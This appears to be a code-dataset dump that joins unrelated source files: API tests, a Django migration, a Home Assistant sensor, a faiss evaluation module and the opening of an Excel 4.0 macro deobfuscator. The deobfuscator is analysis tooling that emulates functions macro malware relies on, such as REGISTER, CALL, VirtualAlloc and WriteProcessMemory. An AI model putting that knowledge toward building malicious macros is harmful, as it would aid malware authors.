}
}, headers={
'Authorization': 'Token {}'.format(token)
})
resp = testapp.post(url_for('articles.favorite_an_article',
slug=resp1.json['article']['slug']),
headers={
'Authorization': 'Token {}'.format(token)
}
)
assert resp.json['article']['favorited']
def test_get_articles_by_favoriter(self, testapp, user):
user = user.get()
resp = testapp.post_json(url_for('user.login_user'), {'user': {
'email': user.email,
'password': 'myprecious'
}})
token = str(resp.json['user']['token'])
for _ in range(2):
testapp.post_json(url_for('articles.make_article'), {
"article": {
"title": "How to train your dragon {}".format(_),
"description": "Ever wonder how?",
"body": "You have to believe",
"tagList": ["reactjs", "angularjs", "dragons"]
}
}, headers={
'Authorization': 'Token {}'.format(token)
})
resp = testapp.get(url_for('articles.get_articles', author=user.username))
assert len(resp.json['articles']) == 2
def test_make_article(self, testapp, user):
user = user.get()
resp = testapp.post_json(url_for('user.login_user'), {'user': {
'email': user.email,
'password': 'myprecious'
}})
token = str(resp.json['user']['token'])
resp = testapp.post_json(url_for('articles.make_article'), {
"article": {
"title": "How to train your dragon",
"description": "Ever wonder how?",
"body": "You have to believe",
"tagList": ["reactjs", "angularjs", "dragons"]
}
}, headers={
'Authorization': 'Token {}'.format(token)
})
assert resp.json['article']['author']['email'] == user.email
assert resp.json['article']['body'] == 'You have to believe'
def test_make_comment_correct_schema(self, testapp, user):
from sayso.profile.serializers import profile_schema
user = user.get()
resp = testapp.post_json(url_for('user.login_user'), {'user': {
'email': user.email,
'password': 'myprecious'
}})
token = str(resp.json['user']['token'])
resp = testapp.post_json(url_for('articles.make_article'), {
"article": {
"title": "How to train your dragon",
"description": "Ever wonder how?",
"body": "You have to believe",
"tagList": ["reactjs", "angularjs", "dragons"]
}
}, headers={
'Authorization': 'Token {}'.format(token)
})
slug = resp.json['article']['slug']
# make a comment
resp = testapp.post_json(url_for('articles.make_comment_on_article', slug=slug), {
"comment": {
"createdAt": datetime.now().isoformat(),
"body": "You have to believe",
}
}, headers={
'Authorization': 'Token {}'.format(token)
})
# check
authorp = resp.json['comment']['author']
del authorp['following']
assert profile_schema.dump(user).data['profile'] == authorp # Fails in Shell
# assert profile_schema.dump(user)['profile'] == authorp # Fails in VSCode
# Yet env is the same in both:
# darwin -- Python 3.7.4, pytest-5.4.1, py-1.8.1, pluggy-0.13.1
| 38.251799
| 90
| 0.507053
|
794fd99c84a35687bd729dbdeee48af2b12fb742
| 2,534
|
py
|
Python
|
src/tests/catwalk_tests/test_individual_importance.py
|
adunmore/triage
|
51f4e5bb73740378d22de16de4b15c78a1feea7b
|
[
"MIT"
] | null | null | null |
src/tests/catwalk_tests/test_individual_importance.py
|
adunmore/triage
|
51f4e5bb73740378d22de16de4b15c78a1feea7b
|
[
"MIT"
] | null | null | null |
src/tests/catwalk_tests/test_individual_importance.py
|
adunmore/triage
|
51f4e5bb73740378d22de16de4b15c78a1feea7b
|
[
"MIT"
] | 1
|
2020-03-07T09:51:43.000Z
|
2020-03-07T09:51:43.000Z
|
from triage.component.catwalk.individual_importance import (
IndividualImportanceCalculator,
)
from tests.utils import (
rig_engines,
fake_trained_model,
matrix_creator,
matrix_metadata_creator,
get_matrix_store,
)
from unittest.mock import patch
def sample_individual_importance_strategy(
db_engine, model_id, as_of_date, test_matrix_store, n_ranks
):
return [
{
"entity_id": 1,
"feature_value": 0.5,
"feature_name": "m_feature",
"score": 0.5,
},
{
"entity_id": 1,
"feature_value": 0.5,
"feature_name": "k_feature",
"score": 0.5,
},
]
@patch.dict(
"triage.component.catwalk.individual_importance.CALCULATE_STRATEGIES",
{"sample": sample_individual_importance_strategy},
)
def test_calculate_and_save():
with rig_engines() as (db_engine, project_storage):
train_store = get_matrix_store(
project_storage,
matrix_creator(),
matrix_metadata_creator(matrix_type="train"),
)
test_store = get_matrix_store(
project_storage,
matrix_creator(),
matrix_metadata_creator(matrix_type="test"),
)
calculator = IndividualImportanceCalculator(
db_engine, methods=["sample"], replace=False
)
# given a trained model
# and a test matrix
_, model_id = fake_trained_model(db_engine, train_matrix_uuid=train_store.uuid)
# i expect to be able to call calculate and save
calculator.calculate_and_save_all_methods_and_dates(model_id, test_store)
# and find individual importances in the results schema afterwards
records = [
row
for row in db_engine.execute(
"""select entity_id, as_of_date
from test_results.individual_importances
join model_metadata.models using (model_id)"""
)
]
assert len(records) > 0
# and that when run again, has the same result
calculator.calculate_and_save_all_methods_and_dates(model_id, test_store)
new_records = [
row
for row in db_engine.execute(
"""select entity_id, as_of_date
from test_results.individual_importances
join model_metadata.models using (model_id)"""
)
]
assert len(records) == len(new_records)
assert records == new_records
| 31.675
| 87
| 0.617995
|
794fd9b86307754cb526b893ffd3a18d8e8e3b29
| 10,139
|
py
|
Python
|
main/migrations/0010_auto__add_field_userevent_geo_lat__add_field_userevent_geo_lon__add_fi.py
|
mattr555/AtYourService
|
41af372176dc607e97851b2c1e8c8efac392787c
|
[
"MIT"
] | 1
|
2020-11-05T07:29:46.000Z
|
2020-11-05T07:29:46.000Z
|
main/migrations/0010_auto__add_field_userevent_geo_lat__add_field_userevent_geo_lon__add_fi.py
|
mattr555/AtYourService
|
41af372176dc607e97851b2c1e8c8efac392787c
|
[
"MIT"
] | null | null | null |
main/migrations/0010_auto__add_field_userevent_geo_lat__add_field_userevent_geo_lon__add_fi.py
|
mattr555/AtYourService
|
41af372176dc607e97851b2c1e8c8efac392787c
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'UserEvent.geo_lat'
db.add_column('main_userevent', 'geo_lat',
self.gf('django.db.models.fields.FloatField')(null=True, blank=True),
keep_default=False)
# Adding field 'UserEvent.geo_lon'
db.add_column('main_userevent', 'geo_lon',
self.gf('django.db.models.fields.FloatField')(null=True, blank=True),
keep_default=False)
# Adding field 'UserProfile.geo_lat'
db.add_column('main_userprofile', 'geo_lat',
self.gf('django.db.models.fields.FloatField')(null=True, blank=True),
keep_default=False)
# Adding field 'UserProfile.geo_lon'
db.add_column('main_userprofile', 'geo_lon',
self.gf('django.db.models.fields.FloatField')(null=True, blank=True),
keep_default=False)
# Adding field 'Event.geo_lat'
db.add_column('main_event', 'geo_lat',
self.gf('django.db.models.fields.FloatField')(null=True, blank=True),
keep_default=False)
# Adding field 'Event.geo_lon'
db.add_column('main_event', 'geo_lon',
self.gf('django.db.models.fields.FloatField')(null=True, blank=True),
keep_default=False)
# Adding field 'Organization.geo_lat'
db.add_column('main_organization', 'geo_lat',
self.gf('django.db.models.fields.FloatField')(null=True, blank=True),
keep_default=False)
# Adding field 'Organization.geo_lon'
db.add_column('main_organization', 'geo_lon',
self.gf('django.db.models.fields.FloatField')(null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'UserEvent.geo_lat'
db.delete_column('main_userevent', 'geo_lat')
# Deleting field 'UserEvent.geo_lon'
db.delete_column('main_userevent', 'geo_lon')
# Deleting field 'UserProfile.geo_lat'
db.delete_column('main_userprofile', 'geo_lat')
# Deleting field 'UserProfile.geo_lon'
db.delete_column('main_userprofile', 'geo_lon')
# Deleting field 'Event.geo_lat'
db.delete_column('main_event', 'geo_lat')
# Deleting field 'Event.geo_lon'
db.delete_column('main_event', 'geo_lon')
# Deleting field 'Organization.geo_lat'
db.delete_column('main_organization', 'geo_lat')
# Deleting field 'Organization.geo_lon'
db.delete_column('main_organization', 'geo_lon')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80', 'unique': 'True'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '30', 'unique': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'main.event': {
'Meta': {'object_name': 'Event'},
'confirmed_participants': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'symmetrical': 'False', 'related_name': "'confirmed_events'"}),
'date_end': ('django.db.models.fields.DateTimeField', [], {}),
'date_start': ('django.db.models.fields.DateTimeField', [], {}),
'description': ('django.db.models.fields.TextField', [], {}),
'geo_lat': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'geo_lon': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '300'}),
'organization': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'events'", 'to': "orm['main.Organization']"}),
'organizer': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'events_organized'", 'to': "orm['auth.User']"}),
'participants': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'symmetrical': 'False', 'related_name': "'events'"})
},
'main.organization': {
'Meta': {'object_name': 'Organization'},
'admin': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'orgs_admin'", 'to': "orm['auth.User']"}),
'description': ('django.db.models.fields.TextField', [], {}),
'geo_lat': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'geo_lon': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'symmetrical': 'False', 'related_name': "'organizations'"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '300'})
},
'main.userevent': {
'Meta': {'object_name': 'UserEvent'},
'date_end': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'date_start': ('django.db.models.fields.DateTimeField', [], {}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'geo_lat': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'geo_lon': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'hours_worked': ('django.db.models.fields.FloatField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'organization': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'user_events'", 'to': "orm['auth.User']"})
},
'main.userprofile': {
'Meta': {'object_name': 'UserProfile'},
'geo_lat': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'geo_lon': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'user_profile'", 'unique': 'True', 'to': "orm['auth.User']"})
}
}
complete_apps = ['main']
| 61.448485
| 184
| 0.568202
|
794fd9bc34add1c4836399941ba668ab552b7b44
| 1,344
|
py
|
Python
|
fit_1D_NestedSampling/examples/multinest/tutorials/example1/1d_multimodal.py
|
crpurcell/pythonFitting
|
54315e336593f7f105f516766fb323662eadd5e3
|
[
"MIT"
] | 1
|
2021-10-11T06:05:56.000Z
|
2021-10-11T06:05:56.000Z
|
fit_1D_NestedSampling/examples/multinest/tutorials/example1/1d_multimodal.py
|
crpurcell/pythonFitting
|
54315e336593f7f105f516766fb323662eadd5e3
|
[
"MIT"
] | null | null | null |
fit_1D_NestedSampling/examples/multinest/tutorials/example1/1d_multimodal.py
|
crpurcell/pythonFitting
|
54315e336593f7f105f516766fb323662eadd5e3
|
[
"MIT"
] | 4
|
2018-08-08T10:38:53.000Z
|
2020-08-08T13:41:07.000Z
|
import json
import numpy
from numpy import log, exp, pi
import scipy.stats, scipy
import pymultinest
import matplotlib.pyplot as plt
# we define the problem: we need a prior function which maps from [0:1] to the parameter space
# we only have one parameter, the position of the gaussian (ndim == 1)
# map it from the unity interval 0:1 to our problem space 0:2 under a uniform prior
def prior(cube, ndim, nparams):
cube[0] = cube[0] * 2
# our likelihood function consists of 6 gaussian modes (solutions) at the positions
positions = numpy.array([0.1, 0.2, 0.5, 0.55, 0.9, 1.1])
width = 0.01
def loglike(cube, ndim, nparams):
# get the current parameter (is between 0:2 now)
pos = cube[0]
likelihood = exp(-0.5 * ((pos - positions) / width)**2) / (2*pi*width**2)**0.5
return log(likelihood.mean())
# number of dimensions our problem has
parameters = ["position"]
n_params = len(parameters)
# run MultiNest
pymultinest.run(loglike, prior, n_params, outputfiles_basename='out/',
resume = False, verbose = True)
json.dump(parameters, open('out/params.json', 'w')) # save parameter names
# now run the script and analyse the output using multinest_marginals.py::
#
# $ python 1_1d_multimodal.py && multinest_marginals.py 1_1d_multimodal_out
#
# then open the file 1_1d_multimodal_outmarg.pdf
#
# Btw, ln(ev) should be ln(1 / 2)
| 31.255814
| 94
| 0.723958
|
794fda86072a9e6d090b8e8bc7b8cef5493861a2
| 637
|
py
|
Python
|
weather.py
|
Tounie123/hellogithu
|
5c21721fe00bbe38e11ed91a3514c905117de813
|
[
"MIT"
] | null | null | null |
weather.py
|
Tounie123/hellogithu
|
5c21721fe00bbe38e11ed91a3514c905117de813
|
[
"MIT"
] | null | null | null |
weather.py
|
Tounie123/hellogithu
|
5c21721fe00bbe38e11ed91a3514c905117de813
|
[
"MIT"
] | null | null | null |
from urllib.request import urlopen
from bs4 import BeautifulSoup
import re
resp=urlopen('http://www.weather.com.cn/weather/101280701.shtml')
print(resp)
soup=BeautifulSoup(resp,'html.parser')
tagToday=soup.find('p',class_="tem") # the first <p> tag with class="tem" holds today's weather data
try:
    temperatureHigh=tagToday.span.string # sometimes today's high temperature is missing; use the next day's high instead
except AttributeError as e:
    temperatureHigh=tagToday.find_next('p',class_="tem").span.string # fall back to the next day's high temperature
temperatureLow=tagToday.i.string # low temperature
weather=soup.find('p',class_="wea").string # weather description
print('Low temperature: ' + temperatureLow)
print('High temperature: ' + temperatureHigh)
print('Weather: ' + weather)
| 33.526316
| 83
| 0.77394
|
794fdac3eac0af3a0a69fca2494c028e527df357
| 2,427
|
py
|
Python
|
homeassistant/components/hunterdouglas_powerview/sensor.py
|
domwillcode/home-assistant
|
f170c80bea70c939c098b5c88320a1c789858958
|
[
"Apache-2.0"
] | 6
|
2020-07-18T16:33:25.000Z
|
2021-09-26T09:52:04.000Z
|
homeassistant/components/hunterdouglas_powerview/sensor.py
|
domwillcode/home-assistant
|
f170c80bea70c939c098b5c88320a1c789858958
|
[
"Apache-2.0"
] | 47
|
2020-07-23T07:13:11.000Z
|
2022-03-31T06:01:46.000Z
|
homeassistant/components/hunterdouglas_powerview/sensor.py
|
klauern/home-assistant-core
|
c18ba6aec0627e6afb6442c678edb5ff2bb17db6
|
[
"Apache-2.0"
] | 5
|
2020-03-29T00:29:13.000Z
|
2021-09-06T20:58:40.000Z
|
"""Support for hunterdouglass_powerview sensors."""
import logging
from aiopvapi.resources.shade import factory as PvShade
from homeassistant.const import DEVICE_CLASS_BATTERY, UNIT_PERCENTAGE
from homeassistant.core import callback
from .const import (
COORDINATOR,
DEVICE_INFO,
DOMAIN,
PV_API,
PV_SHADE_DATA,
SHADE_BATTERY_LEVEL,
SHADE_BATTERY_LEVEL_MAX,
)
from .entity import ShadeEntity
_LOGGER = logging.getLogger(__name__)
async def async_setup_entry(hass, entry, async_add_entities):
"""Set up the hunter douglas shades sensors."""
pv_data = hass.data[DOMAIN][entry.entry_id]
shade_data = pv_data[PV_SHADE_DATA]
pv_request = pv_data[PV_API]
coordinator = pv_data[COORDINATOR]
device_info = pv_data[DEVICE_INFO]
entities = []
for raw_shade in shade_data.values():
shade = PvShade(raw_shade, pv_request)
if SHADE_BATTERY_LEVEL not in shade.raw_data:
continue
name_before_refresh = shade.name
entities.append(
PowerViewShadeBatterySensor(
coordinator, device_info, shade, name_before_refresh
)
)
async_add_entities(entities)
class PowerViewShadeBatterySensor(ShadeEntity):
"""Representation of an shade battery charge sensor."""
@property
def unit_of_measurement(self):
"""Return the unit of measurement."""
return UNIT_PERCENTAGE
@property
def name(self):
"""Name of the shade battery."""
return f"{self._shade_name} Battery"
@property
def device_class(self):
"""Shade battery Class."""
return DEVICE_CLASS_BATTERY
@property
def unique_id(self):
"""Shade battery Uniqueid."""
return f"{self._unique_id}_charge"
@property
def state(self):
"""Get the current value in percentage."""
return round(
self._shade.raw_data[SHADE_BATTERY_LEVEL] / SHADE_BATTERY_LEVEL_MAX * 100
)
async def async_added_to_hass(self):
"""When entity is added to hass."""
self.async_on_remove(
self._coordinator.async_add_listener(self._async_update_shade_from_group)
)
@callback
def _async_update_shade_from_group(self):
"""Update with new data from the coordinator."""
self._shade.raw_data = self._coordinator.data[self._shade.id]
self.async_write_ha_state()
| 27.896552
| 85
| 0.678204
|
794fdba9f029a6a9f9c258c591354c01530f93c0
| 3,367
|
py
|
Python
|
utils/evaluation.py
|
langyijun/proxy-synthesis
|
4c69a17522a4aab9e1cfe568e900ca82b109e427
|
[
"Apache-2.0"
] | 26
|
2021-02-02T02:46:29.000Z
|
2022-02-27T17:17:32.000Z
|
utils/evaluation.py
|
langyijun/proxy-synthesis
|
4c69a17522a4aab9e1cfe568e900ca82b109e427
|
[
"Apache-2.0"
] | 2
|
2021-08-16T09:23:57.000Z
|
2021-12-19T00:47:33.000Z
|
utils/evaluation.py
|
langyijun/proxy-synthesis
|
4c69a17522a4aab9e1cfe568e900ca82b109e427
|
[
"Apache-2.0"
] | 8
|
2021-02-02T04:53:36.000Z
|
2022-02-16T10:25:26.000Z
|
'''
proxy-synthesis
Copyright (c) 2021-present NAVER Corp.
Apache License v2.0
'''
import faiss
import numpy as np
from sklearn.cluster import KMeans
from sklearn.metrics.cluster import normalized_mutual_info_score
def evaluation(X, Y, Kset, args):
def get_recallK(Y_query, YNN, Kset):
recallK = np.zeros(len(Kset))
num = Y_query.shape[0]
for i in range(0, len(Kset)):
pos = 0.
for j in range(0, num):
if Y_query[j] in YNN[j, :Kset[i]]:
pos += 1.
recallK[i] = pos/num
return recallK
def get_Rstat(Y_query, YNN, test_class_dict):
'''
test_class_dict:
key = class_idx, value = the number of images
'''
RP_list = []
MAP_list = []
for gt, knn in zip(Y_query, YNN):
n_imgs = test_class_dict[gt] - 1 # - 1 for query.
selected_knn = knn[:n_imgs]
correct_array = (selected_knn == gt).astype('float32')
RP = np.mean(correct_array)
MAP = 0.0
sum_correct = 0.0
for idx, correct in enumerate(correct_array):
if correct == 1.0:
sum_correct += 1.0
MAP += sum_correct / (idx + 1.0)
MAP = MAP / n_imgs
RP_list.append(RP)
MAP_list.append(MAP)
return np.mean(RP_list), np.mean(MAP_list)
def evaluation_faiss(X, Y, Kset, args):
if args.data_name.lower() != 'inshop':
kmax = np.max(Kset + [args.max_r]) # search K
else:
kmax = np.max(Kset)
test_class_dict = args.test_class_dict
# compute NMI
if args.do_nmi:
classN = np.max(Y)+1
kmeans = KMeans(n_clusters=classN).fit(X)
nmi = normalized_mutual_info_score(Y, kmeans.labels_, average_method='arithmetic')
else:
nmi = 0.0
if args.data_name.lower() != 'inshop':
offset = 1
X_query = X
X_gallery = X
Y_query = Y
Y_gallery = Y
else: # inshop
offset = 0
len_gallery = len(args.gallery_labels)
X_gallery = X[:len_gallery, :]
X_query = X[len_gallery:, :]
Y_query = args.query_labels
Y_gallery = args.gallery_labels
nq, d = X_query.shape
ng, d = X_gallery.shape
I = np.empty([nq, kmax + offset], dtype='int64')
D = np.empty([nq, kmax + offset], dtype='float32')
res = faiss.StandardGpuResources()
res.setDefaultNullStreamAllDevices()
faiss.bruteForceKnn(res, faiss.METRIC_INNER_PRODUCT,
faiss.swig_ptr(X_gallery), True, ng,
faiss.swig_ptr(X_query), True, nq,
d, int(kmax + offset), faiss.swig_ptr(D), faiss.swig_ptr(I))
indices = I[:,offset:]
YNN = Y_gallery[indices]
recallK = get_recallK(Y_query, YNN, Kset)
if args.data_name.lower() != 'inshop':
RP, MAP = get_Rstat(Y_query, YNN, test_class_dict)
else: # inshop
RP = 0
MAP = 0
return nmi, recallK, RP, MAP
return evaluation_faiss(X, Y, Kset, args)
| 30.889908
| 94
| 0.520345
|
794fdc1702c8e25956abc1fda319b65fe44dd668
| 109,730
|
py
|
Python
|
XLMMacroDeobfuscator/deobfuscator.py
|
kirk-sayre-work/XLMMacroDeobfuscator
|
fee0cf5a61e32d7e18f96ab44dbef50a84ed6b96
|
[
"Apache-2.0"
] | null | null | null |
XLMMacroDeobfuscator/deobfuscator.py
|
kirk-sayre-work/XLMMacroDeobfuscator
|
fee0cf5a61e32d7e18f96ab44dbef50a84ed6b96
|
[
"Apache-2.0"
] | null | null | null |
XLMMacroDeobfuscator/deobfuscator.py
|
kirk-sayre-work/XLMMacroDeobfuscator
|
fee0cf5a61e32d7e18f96ab44dbef50a84ed6b96
|
[
"Apache-2.0"
] | null | null | null |
import traceback
import argparse
import base64
import hashlib
import json
import msoffcrypto
import os
import sys
import time
from _ast import arguments
from tempfile import mkstemp
from lark import Lark
from lark.exceptions import ParseError
from lark.lexer import Token
from lark.tree import Tree
from XLMMacroDeobfuscator.excel_wrapper import XlApplicationInternational
from XLMMacroDeobfuscator.xlsm_wrapper import XLSMWrapper
from XLMMacroDeobfuscator.__init__ import __version__
import copy
import linecache
try:
from XLMMacroDeobfuscator.xls_wrapper import XLSWrapper
HAS_XLSWrapper = True
except:
HAS_XLSWrapper = False
print('pywin32 is not installed (only is required if you want to use MS Excel)')
from XLMMacroDeobfuscator.xls_wrapper_2 import XLSWrapper2
from XLMMacroDeobfuscator.xlsb_wrapper import XLSBWrapper
from enum import Enum
import datetime
from XLMMacroDeobfuscator.boundsheet import *
import operator
from distutils.util import strtobool
#debug = True
debug = False
class EvalStatus(Enum):
FullEvaluation = 1
PartialEvaluation = 2
Error = 3
NotImplemented = 4
End = 5
Branching = 6
FullBranching = 7
IGNORED = 8
intermediate_iocs = set()
URL_REGEX = r'.*([hH][tT][tT][pP][sS]?://(([a-zA-Z0-9_\-]+\.[a-zA-Z0-9_\-\.]+(:[0-9]+)?)+(/([/\?&\~=a-zA-Z0-9_\-\.](?!http))+)?)).*'
class EvalResult:
def __init__(self, next_cell, status, value, text):
self.next_cell = next_cell
self.status = status
self.value = value
self.text = None
self.output_level = 0
self.set_text(text)
def __repr__(self):
r = "EvalResult:\n"
r += "\tNext Cell:\t\t" + str(self.next_cell) + "\n"
r += "\tValue:\t\t\t" + str(self.value) + "\n"
r += "\tStatus:\t\t\t" + str(self.status) + "\n"
r += "\tText:\t\t\t" + str(self.text) + "\n"
r += "\tOutput Level:\t\t" + str(self.output_level) + "\n"
return r
@staticmethod
def is_int(text):
try:
int(text)
return True
except (ValueError, TypeError):
return False
@staticmethod
def is_float(text):
try:
float(text)
return True
except (ValueError, TypeError):
return False
@staticmethod
def unwrap_str_literal(string):
result = str(string)
if len(result) > 1 and result.startswith('"') and result.endswith('"'):
result = result[1:-1].replace('""', '"')
return result
@staticmethod
def wrap_str_literal(data):
result = ''
if EvalResult.is_float(data) or (len(data) > 1 and data.startswith('"') and data.endswith('"')):
result = str(data)
elif type(data) is float:
if data.is_integer():
data = int(data)
result = str(data)
elif type(data) is int or type(data) is bool:
result = str(data)
else:
result = '"{}"'.format(data.replace('"', '""'))
return result
def get_text(self, unwrap=False):
result = ''
if self.text is not None:
if self.is_float(self.text):
self.text = float(self.text)
if self.text.is_integer():
self.text = int(self.text)
self.text = str(self.text)
if unwrap:
result = self.unwrap_str_literal(self.text)
else:
result = self.text
return result
def set_text(self, data, wrap=False):
if data is not None:
if wrap:
self.text = self.wrap_str_literal(data)
else:
self.text = str(data)
# Save intermediate URL IOCs if we find them.
for url in re.findall(URL_REGEX, self.text):
url = url[0]
intermediate_iocs.add(url)
class XLMInterpreter:
def __init__(self, xlm_wrapper, output_level=0):
self.xlm_wrapper = xlm_wrapper
self._formula_cache = {}
self.cell_addr_regex_str = r"((?P<sheetname>[^\s]+?|'.+?')!)?\$?(?P<column>[a-zA-Z]+)\$?(?P<row>\d+)"
self.cell_addr_regex = re.compile(self.cell_addr_regex_str)
self.xlm_parser = self.get_parser()
self.defined_names = self.xlm_wrapper.get_defined_names()
self.auto_open_labels = None
self._branch_stack = []
self._while_stack = []
self._function_call_stack = []
self._memory = []
self._files = {}
self._registered_functions = {}
self._workspace_defaults = {}
self._window_defaults = {}
self._cell_defaults = {}
self._expr_rule_names = ['expression', 'concat_expression', 'additive_expression', 'multiplicative_expression']
self._operators = {'+': operator.add, '-': operator.sub, '*': operator.mul, '/': operator.truediv,
'>': operator.gt, '<': operator.lt, '<>': operator.ne, '=': operator.eq}
self._indent_level = 0
self._indent_current_line = False
self.day_of_month = None
self.invoke_interpreter = False
self.first_unknown_cell = None
self.cell_with_unsuccessfull_set = set()
self.selected_range = None
self.active_cell = None
self.ignore_processing = False
self.next_count = 0
self.char_error_count = 0
self.output_level = output_level
self._remove_current_formula_from_cache = False
self._handlers = {
# methods
'END.IF': self.end_if_handler,
'FORMULA.FILL': self.formula_handler,
'GET.CELL': self.get_cell_handler,
'GET.WINDOW': self.get_window_handler,
'GET.WORKSPACE': self.get_workspace_handler,
'ON.TIME': self.on_time_handler,
'SET.VALUE': self.set_value_handler,
'SET.NAME': self.set_name_handler,
'ACTIVE.CELL': self.active_cell_handler,
# functions
'AND': self.and_handler,
'CALL': self.call_handler,
'CHAR': self.char_handler,
'CLOSE': self.halt_handler,
'CONCATENATE': self.concatenate_handler,
'DAY': self.day_handler,
'DEFINE.NAME': self.define_name_handler,
'DIRECTORY': self.directory_handler,
'ERROR': self.error_handler,
'FORMULA': self.formula_handler,
'FOPEN': self.fopen_handler,
'FWRITE': self.fwrite_handler,
'FWRITELN': self.fwriteln_handler,
'GOTO': self.goto_handler,
'HALT': self.halt_handler,
'IF': self.if_handler,
'LEN': self.len_handler,
'MID': self.mid_handler,
'NEXT': self.next_handler,
'NOW': self.now_handler,
'OR': self.or_handler,
'OFFSET': self.offset_handler,
'REGISTER': self.register_handler,
'RETURN': self.return_handler,
'ROUND': self.round_handler,
'RUN': self.run_handler,
'SEARCH': self.search_handler,
'SELECT': self.select_handler,
'WHILE': self.while_handler,
# Windows API
'Kernel32.VirtualAlloc': self.VirtualAlloc_handler,
'Kernel32.WriteProcessMemory': self.WriteProcessMemory_handler,
'Kernel32.RtlCopyMemory': self.RtlCopyMemory_handler,
}
jump_functions = ('GOTO', 'RUN')
important_functions = ('CALL', 'FOPEN', 'FWRITE', 'FREAD', 'REGISTER', 'IF', 'WHILE', 'HALT', 'CLOSE', "NEXT")
important_methods = ('SET.VALUE', 'FILE.DELETE', 'WORKBOOK.HIDE')
def __copy__(self):
result = XLMInterpreter(self.xlm_wrapper)
result.auto_open_labels = self.auto_open_labels
result._workspace_defaults = self._workspace_defaults
result._window_defaults = self._window_defaults
result._cell_defaults = self._cell_defaults
result._formula_cache = self._formula_cache
return result
@staticmethod
def is_float(text):
try:
float(text)
return True
except (ValueError, TypeError):
return False
@staticmethod
def is_int(text):
try:
int(text)
return True
except (ValueError, TypeError):
return False
@staticmethod
def is_bool(text):
try:
strtobool(text)
return True
except (ValueError, TypeError, AttributeError):
return False
def get_parser(self):
xlm_parser = None
grammar_file_path = os.path.join(os.path.dirname(__file__), 'xlm-macro.lark.template')
with open(grammar_file_path, 'r', encoding='utf_8') as grammar_file:
macro_grammar = grammar_file.read()
macro_grammar = macro_grammar.replace('{{XLLEFTBRACKET}}',
